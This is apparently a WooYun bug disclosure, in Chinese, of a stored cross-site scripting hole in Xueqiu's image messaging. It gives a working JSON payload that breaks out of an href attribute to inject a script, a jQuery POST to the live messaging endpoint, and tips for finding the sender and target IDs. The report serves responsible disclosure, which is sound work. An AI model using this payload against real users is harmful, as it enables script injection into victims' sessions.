WooYun.org

// 这是一段图片消息 的html结构 其中 a 标签的 href 可以 引号爆破 然后插入js脚本
<div class="msg_icw">
<a class="snbim-msgitem-image" href="http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900" target="_blank">
<img class="snbim_msgimg" width="120" height="75" title="查看原图[1440x900]" src="http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg!thumb.png" onload="$(this).trigger('loadsucc')" onerror="$(this).trigger('err')"> </a> <span class="snbim-msgitem-time">09:32</span>
</div>

var pa1={"toId":5331291206,"toGroup":false,"sequenceId":365395132,"image":"http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900"}
// bo.imgage 处可以引号爆破  这是个正常参数 
var bo={"toId":5331291206,"toGroup":false,"sequenceId":365395134,"image":"http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900\" > <script>alert(1)</script>"}
// 这是攻击参数
// 注意sequenceId 要唯一，自己写个没用过的id吧
jQuery.ajax({url: "https://im9.xueqiu.com/im-comet/v2/messages.json?user_id=1349803048",type: "POST",timeout: 2e4,contentType: "application/json",data: JSON.stringify(bo)});

url的user_id 你的账号id ，抓http请求包就能看见
toId 是对方id ，你随便搜个人 发消息 就能看见
漏洞的危害程度你们懂的。
其次，不算漏洞，只算bug，也一并改了吧。
文本消息 前台页面没过滤 。 发消息的时候 直接输入<script>alert(1)</script>是可以弹框的。 还好后台先正则过滤，又html转义。 但是，前台不过滤，影响体验。。普通正常用户 打个p><p 这种字符表情都不行。。都被你们搞乱了。。